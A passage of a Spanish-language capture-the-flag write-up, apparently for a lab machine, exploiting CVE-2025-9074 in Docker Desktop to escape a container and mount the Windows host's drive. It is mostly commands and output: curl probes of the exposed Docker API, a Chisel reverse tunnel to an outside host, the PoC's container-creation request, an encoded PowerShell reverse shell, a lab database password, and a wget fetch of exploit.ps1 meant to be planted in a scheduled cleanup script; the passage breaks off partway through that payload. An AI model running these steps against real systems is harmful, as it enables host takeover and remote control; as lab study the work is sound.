El Changelog muestra Docker Desktop 4.44.2, esta version permite acceder a contenedores Linux a la API de Docker a traves de la subnet por default (192.168.65.7:2375), esto permite administrar contenedores, crear nuevos contenedores e imagenes, con ello, posiblemente acceder al almacenamiento host de ejecutarse Docker en WSL, montando el disco host. Esto ultimo podria indicar el caso de la maquina, ya que el puerto WinRM esta a la escucha pero tenemos acesso a un contenedor Linux.

CVE-2025-9074.

Version	Date	Title	Change	Description
V.1.7	May 16, 2025	Infrastructure Notice	Infrastructure	Migrated MonitorsFour infrastructure to Windows and Docker Desktop 4.44.2, enabling containerized deployments for improved portability, scalability, and easier environment management.

Verificamos con una solicitud curl a 192.168.65.7:2375/info, este muestra informacion de docker.

1
2
3


www-data@821fbd6a43fa:~/html/cacti$ curl -s 192.168.65.7:2375/info
{"ID":"e9938dea-4226-47b1-9455-ca938cb3e01a","Containers":2,"ContainersRunning":2,"ContainersPaused":0,"ContainersStopped":0,"Images":3,"Driver":"overlayfs","DriverStatus":[["driver-type","io.containerd.snapshotter.v1"]],"Plugins":{"Volume":["local"],"Network":["bridge","host","ipvlan","macvlan","null","overlay"],"Authorization":null,"Log":["awslogs","fluentd","gcplogs","gelf","journald","json-file","local","splunk","syslog"]},"MemoryLimit":true,"SwapLimit":true,"CpuCfsPeriod":true,"CpuCfsQuota":true,"CPUShares":true,"CPUSet":true,"PidsLimit":true,"IPv4Forwarding":true,"Debug":false,"NFd":81,"OomKillDisable":false,"NGoroutines":108,"SystemTime":"2026-02-02T07:15:15.986297504Z","LoggingDriver":"json-file","CgroupDriver":"cgroupfs","CgroupVersion":"2","NEventsListener":12,"KernelVersion":"6.6.87.2-microsoft-standard-WSL2","OperatingSystem":"Docker Desktop","OSVersion":"","OSType":"linux","Architecture":"x86_64","IndexServerAddress":"https://index.docker.io/v1/","RegistryConfig":{"IndexConfigs":{"docker.io":{"Mirrors":[],"Name":"docker.io","Official":true,"Secure":true},"hubproxy.docker.internal:5555":{"Mirrors":[],"Name":"hubproxy.docker.internal:5555","Official":false,"Secure":false}},"InsecureRegistryCIDRs":["::1/128","127.0.0.0/8"],"Mirrors":null},"NCPU":2,"MemTotal":1995177984,"GenericResources":null,"DockerRootDir":"/var/lib/docker","HttpProxy":"http.docker.internal:3128","HttpsProxy":"http.docker.internal:3128","NoProxy":"hubproxy.docker.internal","Name":"docker-desktop","Labels":[],"ExperimentalBuild":false,"ServerVersion":"28.3.2","Runtimes":{"io.containerd.runc.v2":{"path":"runc","status":{"org.opencontainers.runtime-spec.features":"{\"ociVersionMin\":\"1.0.0\",\"ociVersionMax\":\"1.2.0\",\"hooks\":[\"prestart\",\"createRuntime\",\"createContainer\",\"startContainer\",\"poststart\",\"poststop\"],\"mountOptions\":[\"async\",\"atime\",\"bind\",\"defaults\",\"dev\",\"diratime\",\"dirsync\",\"exec\",\"iversion\",\"lazytime\",\"loud\",\"mand\",\"noatime\",\"nodev\",\"nodiratime\",\"noexec\",\"noiversion\",\"nolazytime\",\"nomand\",\"norelatime\",\"nostrictatime\",\"nosuid\",\"nosymfollow\",\"private\",\"ratime\",\"rbind\",\"rdev\",\"rdiratime\",\"relatime\",\"remount\",\"rexec\",\"rnoatime\",\"rnodev\",\"rnodiratime\",\"rnoexec\",\"rnorelatime\",\"rnostrictatime\",\"rnosuid\",\"rnosymfollow\",\"ro\",\"rprivate\",\"rrelatime\",\"rro\",\"rrw\",\"rshared\",\"rslave\",\"rstrictatime\",\"rsuid\",\"rsymfollow\",\"runbindable\",\"rw\",\"shared\",\"silent\",\"slave\",\"strictatime\",\"suid\",\"symfollow\",\"sync\",\"tmpcopyup\",\"unbindable\"],\"linux\":{\"namespaces\":[\"cgroup\",\"ipc\",\"mount\",\"network\",\"pid\",\"time\",\"user\",\"uts\"],\"capabilities\":[\"CAP_CHOWN\",\"CAP_DAC_OVERRIDE\",\"CAP_DAC_READ_SEARCH\",\"CAP_FOWNER\",\"CAP_FSETID\",\"CAP_KILL\",\"CAP_SETGID\",\"CAP_SETUID\",\"CAP_SETPCAP\",\"CAP_LINUX_IMMUTABLE\",\"CAP_NET_BIND_SERVICE\",\"CAP_NET_BROADCAST\",\"CAP_NET_ADMIN\",\"CAP_NET_RAW\",\"CAP_IPC_LOCK\",\"CAP_IPC_OWNER\",\"CAP_SYS_MODULE\",\"CAP_SYS_RAWIO\",\"CAP_SYS_CHROOT\",\"CAP_SYS_PTRACE\",\"CAP_SYS_PACCT\",\"CAP_SYS_ADMIN\",\"CAP_SYS_BOOT\",\"CAP_SYS_NICE\",\"CAP_SYS_RESOURCE\",\"CAP_SYS_TIME\",\"CAP_SYS_TTY_CONFIG\",\"CAP_MKNOD\",\"CAP_LEASE\",\"CAP_AUDIT_WRITE\",\"CAP_AUDIT_CONTROL\",\"CAP_SETFCAP\",\"CAP_MAC_OVERRIDE\",\"CAP_MAC_ADMIN\",\"CAP_SYSLOG\",\"CAP_WAKE_ALARM\",\"CAP_BLOCK_SUSPEND\",\"CAP_AUDIT_READ\",\"CAP_PERFMON\",\"CAP_BPF\",\"CAP_CHECKPOINT_RESTORE\"],\"cgroup\":{\"v1\":true,\"v2\":true,\"systemd\":true,\"systemdUser\":true,\"rdma\":true},\"seccomp\":{\"enabled\":true,\"actions\":[\"SCMP_ACT_ALLOW\",\"SCMP_ACT_ERRNO\",\"SCMP_ACT_KILL\",\"SCMP_ACT_KILL_PROCESS\",\"SCMP_ACT_KILL_THREAD\",\"SCMP_ACT_LOG\",\"SCMP_ACT_NOTIFY\",\"SCMP_ACT_TRACE\",\"SCMP_ACT_TRAP\"],\"operators\":[\"SCMP_CMP_EQ\",\"SCMP_CMP_GE\",\"SCMP_CMP_GT\",\"SCMP_CMP_LE\",\"SCMP_CMP_LT\",\"SCMP_CMP_MASKED_EQ\",\"SCMP_CMP_NE\"],\"archs\":[\"SCMP_ARCH_AARCH64\",\"SCMP_ARCH_ARM\",\"SCMP_ARCH_MIPS\",\"SCMP_ARCH_MIPS64\",\"SCMP_ARCH_MIPS64N32\",\"SCMP_ARCH_MIPSEL\",\"SCMP_ARCH_MIPSEL64\",\"SCMP_ARCH_MIPSEL64N32\",\"SCMP_ARCH_PPC\",\"SCMP_ARCH_PPC64\",\"SCMP_ARCH_PPC64LE\",\"SCMP_ARCH_RISCV64\",\"SCMP_ARCH_S390\",\"SCMP_ARCH_S390X\",\"SCMP_ARCH_X32\",\"SCMP_ARCH_X86\",\"SCMP_ARCH_X86_64\"],\"knownFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"],\"supportedFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"]},\"apparmor\":{\"enabled\":true},\"selinux\":{\"enabled\":true},\"intelRdt\":{\"enabled\":true},\"mountExtensions\":{\"idmap\":{\"enabled\":true}}},\"annotations\":{\"io.github.seccomp.libseccomp.version\":\"2.5.4\",\"org.opencontainers.runc.checkpoint.enabled\":\"true\",\"org.opencontainers.runc.commit\":\"v1.2.5-0-g59923ef\",\"org.opencontainers.runc.version\":\"1.2.5\"},\"potentiallyUnsafeConfigAnnotations\":[\"bundle\",\"org.systemd.property.\",\"org.criu.config\"]}"}},"nvidia":{"path":"nvidia-container-runtime","status":{"org.opencontainers.runtime-spec.features":"{\"ociVersionMin\":\"1.0.0\",\"ociVersionMax\":\"1.2.0\",\"hooks\":[\"prestart\",\"createRuntime\",\"createContainer\",\"startContainer\",\"poststart\",\"poststop\"],\"mountOptions\":[\"async\",\"atime\",\"bind\",\"defaults\",\"dev\",\"diratime\",\"dirsync\",\"exec\",\"iversion\",\"lazytime\",\"loud\",\"mand\",\"noatime\",\"nodev\",\"nodiratime\",\"noexec\",\"noiversion\",\"nolazytime\",\"nomand\",\"norelatime\",\"nostrictatime\",\"nosuid\",\"nosymfollow\",\"private\",\"ratime\",\"rbind\",\"rdev\",\"rdiratime\",\"relatime\",\"remount\",\"rexec\",\"rnoatime\",\"rnodev\",\"rnodiratime\",\"rnoexec\",\"rnorelatime\",\"rnostrictatime\",\"rnosuid\",\"rnosymfollow\",\"ro\",\"rprivate\",\"rrelatime\",\"rro\",\"rrw\",\"rshared\",\"rslave\",\"rstrictatime\",\"rsuid\",\"rsymfollow\",\"runbindable\",\"rw\",\"shared\",\"silent\",\"slave\",\"strictatime\",\"suid\",\"symfollow\",\"sync\",\"tmpcopyup\",\"unbindable\"],\"linux\":{\"namespaces\":[\"cgroup\",\"ipc\",\"mount\",\"network\",\"pid\",\"time\",\"user\",\"uts\"],\"capabilities\":[\"CAP_CHOWN\",\"CAP_DAC_OVERRIDE\",\"CAP_DAC_READ_SEARCH\",\"CAP_FOWNER\",\"CAP_FSETID\",\"CAP_KILL\",\"CAP_SETGID\",\"CAP_SETUID\",\"CAP_SETPCAP\",\"CAP_LINUX_IMMUTABLE\",\"CAP_NET_BIND_SERVICE\",\"CAP_NET_BROADCAST\",\"CAP_NET_ADMIN\",\"CAP_NET_RAW\",\"CAP_IPC_LOCK\",\"CAP_IPC_OWNER\",\"CAP_SYS_MODULE\",\"CAP_SYS_RAWIO\",\"CAP_SYS_CHROOT\",\"CAP_SYS_PTRACE\",\"CAP_SYS_PACCT\",\"CAP_SYS_ADMIN\",\"CAP_SYS_BOOT\",\"CAP_SYS_NICE\",\"CAP_SYS_RESOURCE\",\"CAP_SYS_TIME\",\"CAP_SYS_TTY_CONFIG\",\"CAP_MKNOD\",\"CAP_LEASE\",\"CAP_AUDIT_WRITE\",\"CAP_AUDIT_CONTROL\",\"CAP_SETFCAP\",\"CAP_MAC_OVERRIDE\",\"CAP_MAC_ADMIN\",\"CAP_SYSLOG\",\"CAP_WAKE_ALARM\",\"CAP_BLOCK_SUSPEND\",\"CAP_AUDIT_READ\",\"CAP_PERFMON\",\"CAP_BPF\",\"CAP_CHECKPOINT_RESTORE\"],\"cgroup\":{\"v1\":true,\"v2\":true,\"systemd\":true,\"systemdUser\":true,\"rdma\":true},\"seccomp\":{\"enabled\":true,\"actions\":[\"SCMP_ACT_ALLOW\",\"SCMP_ACT_ERRNO\",\"SCMP_ACT_KILL\",\"SCMP_ACT_KILL_PROCESS\",\"SCMP_ACT_KILL_THREAD\",\"SCMP_ACT_LOG\",\"SCMP_ACT_NOTIFY\",\"SCMP_ACT_TRACE\",\"SCMP_ACT_TRAP\"],\"operators\":[\"SCMP_CMP_EQ\",\"SCMP_CMP_GE\",\"SCMP_CMP_GT\",\"SCMP_CMP_LE\",\"SCMP_CMP_LT\",\"SCMP_CMP_MASKED_EQ\",\"SCMP_CMP_NE\"],\"archs\":[\"SCMP_ARCH_AARCH64\",\"SCMP_ARCH_ARM\",\"SCMP_ARCH_MIPS\",\"SCMP_ARCH_MIPS64\",\"SCMP_ARCH_MIPS64N32\",\"SCMP_ARCH_MIPSEL\",\"SCMP_ARCH_MIPSEL64\",\"SCMP_ARCH_MIPSEL64N32\",\"SCMP_ARCH_PPC\",\"SCMP_ARCH_PPC64\",\"SCMP_ARCH_PPC64LE\",\"SCMP_ARCH_RISCV64\",\"SCMP_ARCH_S390\",\"SCMP_ARCH_S390X\",\"SCMP_ARCH_X32\",\"SCMP_ARCH_X86\",\"SCMP_ARCH_X86_64\"],\"knownFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"],\"supportedFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"]},\"apparmor\":{\"enabled\":true},\"selinux\":{\"enabled\":true},\"intelRdt\":{\"enabled\":true},\"mountExtensions\":{\"idmap\":{\"enabled\":true}}},\"annotations\":{\"io.github.seccomp.libseccomp.version\":\"2.5.4\",\"org.opencontainers.runc.checkpoint.enabled\":\"true\",\"org.opencontainers.runc.commit\":\"v1.2.5-0-g59923ef\",\"org.opencontainers.runc.version\":\"1.2.5\"},\"potentiallyUnsafeConfigAnnotations\":[\"bundle\",\"org.systemd.property.\",\"org.criu.config\"]}"}},"runc":{"path":"runc","status":{"org.opencontainers.runtime-spec.features":"{\"ociVersionMin\":\"1.0.0\",\"ociVersionMax\":\"1.2.0\",\"hooks\":[\"prestart\",\"createRuntime\",\"createContainer\",\"startContainer\",\"poststart\",\"poststop\"],\"mountOptions\":[\"async\",\"atime\",\"bind\",\"defaults\",\"dev\",\"diratime\",\"dirsync\",\"exec\",\"iversion\",\"lazytime\",\"loud\",\"mand\",\"noatime\",\"nodev\",\"nodiratime\",\"noexec\",\"noiversion\",\"nolazytime\",\"nomand\",\"norelatime\",\"nostrictatime\",\"nosuid\",\"nosymfollow\",\"private\",\"ratime\",\"rbind\",\"rdev\",\"rdiratime\",\"relatime\",\"remount\",\"rexec\",\"rnoatime\",\"rnodev\",\"rnodiratime\",\"rnoexec\",\"rnorelatime\",\"rnostrictatime\",\"rnosuid\",\"rnosymfollow\",\"ro\",\"rprivate\",\"rrelatime\",\"rro\",\"rrw\",\"rshared\",\"rslave\",\"rstrictatime\",\"rsuid\",\"rsymfollow\",\"runbindable\",\"rw\",\"shared\",\"silent\",\"slave\",\"strictatime\",\"suid\",\"symfollow\",\"sync\",\"tmpcopyup\",\"unbindable\"],\"linux\":{\"namespaces\":[\"cgroup\",\"ipc\",\"mount\",\"network\",\"pid\",\"time\",\"user\",\"uts\"],\"capabilities\":[\"CAP_CHOWN\",\"CAP_DAC_OVERRIDE\",\"CAP_DAC_READ_SEARCH\",\"CAP_FOWNER\",\"CAP_FSETID\",\"CAP_KILL\",\"CAP_SETGID\",\"CAP_SETUID\",\"CAP_SETPCAP\",\"CAP_LINUX_IMMUTABLE\",\"CAP_NET_BIND_SERVICE\",\"CAP_NET_BROADCAST\",\"CAP_NET_ADMIN\",\"CAP_NET_RAW\",\"CAP_IPC_LOCK\",\"CAP_IPC_OWNER\",\"CAP_SYS_MODULE\",\"CAP_SYS_RAWIO\",\"CAP_SYS_CHROOT\",\"CAP_SYS_PTRACE\",\"CAP_SYS_PACCT\",\"CAP_SYS_ADMIN\",\"CAP_SYS_BOOT\",\"CAP_SYS_NICE\",\"CAP_SYS_RESOURCE\",\"CAP_SYS_TIME\",\"CAP_SYS_TTY_CONFIG\",\"CAP_MKNOD\",\"CAP_LEASE\",\"CAP_AUDIT_WRITE\",\"CAP_AUDIT_CONTROL\",\"CAP_SETFCAP\",\"CAP_MAC_OVERRIDE\",\"CAP_MAC_ADMIN\",\"CAP_SYSLOG\",\"CAP_WAKE_ALARM\",\"CAP_BLOCK_SUSPEND\",\"CAP_AUDIT_READ\",\"CAP_PERFMON\",\"CAP_BPF\",\"CAP_CHECKPOINT_RESTORE\"],\"cgroup\":{\"v1\":true,\"v2\":true,\"systemd\":true,\"systemdUser\":true,\"rdma\":true},\"seccomp\":{\"enabled\":true,\"actions\":[\"SCMP_ACT_ALLOW\",\"SCMP_ACT_ERRNO\",\"SCMP_ACT_KILL\",\"SCMP_ACT_KILL_PROCESS\",\"SCMP_ACT_KILL_THREAD\",\"SCMP_ACT_LOG\",\"SCMP_ACT_NOTIFY\",\"SCMP_ACT_TRACE\",\"SCMP_ACT_TRAP\"],\"operators\":[\"SCMP_CMP_EQ\",\"SCMP_CMP_GE\",\"SCMP_CMP_GT\",\"SCMP_CMP_LE\",\"SCMP_CMP_LT\",\"SCMP_CMP_MASKED_EQ\",\"SCMP_CMP_NE\"],\"archs\":[\"SCMP_ARCH_AARCH64\",\"SCMP_ARCH_ARM\",\"SCMP_ARCH_MIPS\",\"SCMP_ARCH_MIPS64\",\"SCMP_ARCH_MIPS64N32\",\"SCMP_ARCH_MIPSEL\",\"SCMP_ARCH_MIPSEL64\",\"SCMP_ARCH_MIPSEL64N32\",\"SCMP_ARCH_PPC\",\"SCMP_ARCH_PPC64\",\"SCMP_ARCH_PPC64LE\",\"SCMP_ARCH_RISCV64\",\"SCMP_ARCH_S390\",\"SCMP_ARCH_S390X\",\"SCMP_ARCH_X32\",\"SCMP_ARCH_X86\",\"SCMP_ARCH_X86_64\"],\"knownFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"],\"supportedFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"]},\"apparmor\":{\"enabled\":true},\"selinux\":{\"enabled\":true},\"intelRdt\":{\"enabled\":true},\"mountExtensions\":{\"idmap\":{\"enabled\":true}}},\"annotations\":{\"io.github.seccomp.libseccomp.version\":\"2.5.4\",\"org.opencontainers.runc.checkpoint.enabled\":\"true\",\"org.opencontainers.runc.commit\":\"v1.2.5-0-g59923ef\",\"org.opencontainers.runc.version\":\"1.2.5\"},\"potentiallyUnsafeConfigAnnotations\":[\"bundle\",\"org.systemd.property.\",\"org.criu.config\"]}"}}},"DefaultRuntime":"runc","Swarm":{"NodeID":"","NodeAddr":"","LocalNodeState":"inactive","ControlAvailable":false,"Error":"","RemoteManagers":null},"LiveRestoreEnabled":false,"Isolation":"","InitBinary":"docker-init","ContainerdCommit":{"ID":"05044ec0a9a75232cad458027ca83437aae3f4da"},"RuncCommit":{"ID":"v1.2.5-0-g59923ef"},"InitCommit":{"ID":"de40ad0"},"SecurityOptions":["name=seccomp,profile=builtin","name=cgroupns"],"FirewallBackend":{"Driver":"iptables"},"CDISpecDirs":["/etc/cdi","/var/run/cdi"],"DiscoveredDevices":[{"Source":"cdi","ID":"docker.com/gpu=webgpu"}],"Containerd":{"Address":"/run/containerd/containerd.sock","Namespaces":{"Containers":"moby","Plugins":"plugins.moby"}},"Warnings":["WARNING: DOCKER_INSECURE_NO_IPTABLES_RAW is set"]}
www-data@821fbd6a43fa:~/html/cacti$

Port Forwarding

Ralizamos port forwarding para obtener el puerto e IP localmente con Chisel.

1
2
3
4
5
6
7
8
9


www-data@821fbd6a43fa:/tmp/tmp$ curl 10.10.14.26/chisel_linux -o chisel; chmod +x chisel
<10.10.14.26/chisel_linux -o chisel; chmod +x chisel
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9.7M  100  9.7M    0     0  2876k      0  0:00:03  0:00:03 --:--:-- 2876k
www-data@821fbd6a43fa:/tmp/tmp$ ./chisel client 10.10.14.26:7070 R:2375:192.168.65.7:2375
<el client 10.10.14.26:7070 R:2375:192.168.65.7:2375
2025/12/07 05:46:42 client: Connecting to ws://10.10.14.26:7070
2025/12/07 05:46:42 client: Connected (Latency 69.992734ms)

1
2
3
4
5


❯ ./chisel_linux server --reverse --port 7070
2025/12/06 23:46:17 server: Reverse tunnelling enabled
2025/12/06 23:46:17 server: Fingerprint mRjX1huwFOxQyx2VIUd6pbI7h8QJ+HXm0ArI/BWQGBM=
2025/12/06 23:46:17 server: Listening on http://0.0.0.0:7070
2025/12/06 23:47:12 server: session#1: tun: proxy#R:2375=>192.168.65.7:2375: Listening

CVE-2025-9074

Clonamos el repositorio PoC-for-CVE-2025-9074 que aloja el exploit. Este inicia verificando que la API este presente, intenta obtener la imagen alpine para crear un contenedor al que finalmente se accede a traves de docker.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32


# Verify API
http://127.0.0.1:2375/info

# Tries to pull `alpine` image
# POST Request
http://127.0.0.1:2375/images/create?fromImage=alpine&tag=latest


# 2 - Create a Container with `alpine` Image with host filesystem bind-mounted at /mnt 
# POST Request
http://127.0.0.1:2375/containers/create
{
  "Image": alpine,     
  "Cmd": ["/bin/sh"],    
  "Tty": True,           
  "HostConfig": {        
    "Mounts": [          
      {
        "Type": "bind",
        "Source": "/run/desktop/mnt/host/c/", 
        "Target": "/mnt" 
      }
    ]
  }
}

# Starts the container
# POST Request
http://127.0.0.1:2375/containers/<container_id>/start

# Access container
docker exec -it {short_id} sh

Tras ejecutar el exploit este logro la creacion del contenedor.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


❯ python poc_cve_2025_9074.py
Please enter the host:port of the target Docker API (Default: 127.0.0.1:2375): 
[+] Target URL: http://127.0.0.1:2375
[1/5] Checking Docker API connection status...
[+] Connection successful! Docker API exposure detected.
Detected presence of CVE-2025-9074 vulnerability.

[2/5] Attempting to pull the required image: alpine...
[-] Image pull failed. This might cause the next step to fail. Error: 500 Server Error: Internal Server Error for url: http://127.0.0.1:2375/images/create?fromImage=alpine&tag=latest

[3/5] Preparing malicious container creation request payload...
[4/5] Sending container creation request...
[+] Container created successfully. ID: dfe295213561
[5/5] Starting container...
[+] Container started successfully!

==============================================
[*] PoC completed. You can now manually connect to the newly created container to access the host's filesystem:
    docker exec -it dfe295213561 sh
[*] Inside the container, the host's bind-mounted path will be located at /mnt.
    Example: Type 'ls /mnt' to view the host directory.
==============================================
❯

Especificamos la variable DOCKER_HOST y ejecutamos sh para acceder al contenedor, logrando acceso root y a la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


❯ export DOCKER_HOST=tcp://127.0.0.1:2375
❯ docker exec -it dfe295213561 sh
/ # whoami
root
# ... cut ...
/mnt/Users/marcus # cd Desktop
/mnt/Users/marcus/Desktop # ls
desktop.ini  user.txt
/mnt/Users/marcus/Desktop # cat user.txt
835f551bd7b3a052991e50195caeac60
/mnt/Users/marcus/Desktop #

Tambien la flag root.txt.

1
2
3
4
5
6
7
8
9


/mnt/Users # ls -lah administrator/desktop
total 0      
drwxrwxrwx    1 root     root        4.0K Nov 10 17:54 .
drwxrwxrwx    1 root     root        4.0K Nov  3 12:05 ..
-rwxrwxrwx    1 root     root         282 Mar 24  2025 desktop.ini
-r-xr-xr-x    1 root     root          34 Dec  6 22:31 root.txt
/mnt/Users # cat administrator/desktop/root.txt
9ab22c7d0b315b476d2a05261b414a0d
/mnt/Users #

User - Administrator

Localmente en el directorio de administrator encontramos multiples scripts restaurar al estado original la maquina, posiblemente ScheduledTask.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64


/mnt/Users/Administrator/documents # ls -lah
total 8K     
drwxrwxrwx    1 root     root        4.0K Nov 11 12:53 .
drwxrwxrwx    1 root     root        4.0K Nov  3 12:05 ..
lrwxrwxrwx    1 root     root          37 Mar 24  2025 My Music -> /mnt/host/c/Users/Administrator/Music
lrwxrwxrwx    1 root     root          40 Mar 24  2025 My Pictures -> /mnt/host/c/Users/Administrator/Pictures
lrwxrwxrwx    1 root     root          38 Mar 24  2025 My Videos -> /mnt/host/c/Users/Administrator/Videos
-rwxrwxrwx    1 root     root         508 Nov 10 17:55 container_cleanup.ps1
-rwxrwxrwx    1 root     root         453 Nov  3 12:16 copy.ps1
-rwxrwxrwx    1 root     root         445 Oct 30 16:29 db_cleanup.ps1
-rwxrwxrwx    1 root     root         402 Mar 24  2025 desktop.ini
drwxrwxrwx    1 root     root        4.0K Oct 30 08:12 docker_setup
/mnt/Users/Administrator/documents # cat copy.ps1
$localFile = "C:\Users\marcus\Desktop\user.txt"
$containerName = "web"
$containerFile = "/home/marcus/user.txt"
$attempts = 50

for ($i = 1; $i -le $attempts; $i++) {
    $status = docker inspect -f '{{.State.Running}}' $containerName 2>$null

    if ($status -eq "true") {
        docker cp $localFile ($containerName + ":" + $containerFile)
    } else {
        Start-Sleep -Seconds 5
        $i--
    }

    Start-Sleep -Seconds 2
}
/mnt/Users/Administrator/documents # cat container_cleanup.ps1
start-sleep 100

$containers = docker ps --format "{{.ID}} {{.Image}} {{.RunningFor}}"

foreach ($line in $containers) {
    $parts = $line -split ' '
    $id = $parts[0]
    $image = $parts[1]
    $time = $parts[2]
    $unit = $parts[3]

    if ($image -in @('docker_setup-nginx-php', 'docker_setup-mariadb')) {
        continue
    }

    if (($unit -eq 'minutes' -and [int]$time -gt 10) -or
        ($unit -eq 'hours') -or
        ($unit -eq 'days')) {
        docker rm -f $id
    }
}/mnt/Users/Administrator/documents # cat db_cleanup.ps1
$containerName = "web"
$localSqlFile = "C:\Users\Administrator\Documents\02-cacti.sql"
$containerSqlFile = "/tmp/02-cacti.sql"
$dbUser = "cactidbuser"
$dbPass = "7pyrf6ly8qx4"
$dbHost = "mariadb"
$dbName = "cacti"

docker cp $localSqlFile "$($containerName):$containerSqlFile"
docker exec -i $containerName bash -c "mysql -u $dbUser -p$dbPass -h $dbHost $dbName < $containerSqlFile"
docker exec $containerName rm -f $containerSqlFile
/mnt/Users/Administrator/documents # 

Generamos una shell inversa con revshells para powershell.

1

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA2ACIALAA1ADUANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Agregamos la ejecucion al archivo container_cleanup.ps1.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


/mnt/Users/administrator/documents # wget 10.10.14.26/exploit.ps1
Connecting to 10.10.14.26 (10.10.14.26:80)
saving to 'exploit.ps1'
exploit.ps1          100% |****************************************************************************************************************************************|  1841  0:00:00 ETA
'exploit.ps1' saved
/mnt/Users/administrator/documents # ls
My Music               My Videos              copy.ps1               desktop.ini            exploit.ps1
My Pictures            container_cleanup.ps1  db_cleanup.ps1         docker_setup
/mnt/Users/administrator/documents # cat exploit.ps1
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA2ACIALAA1ADUANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBk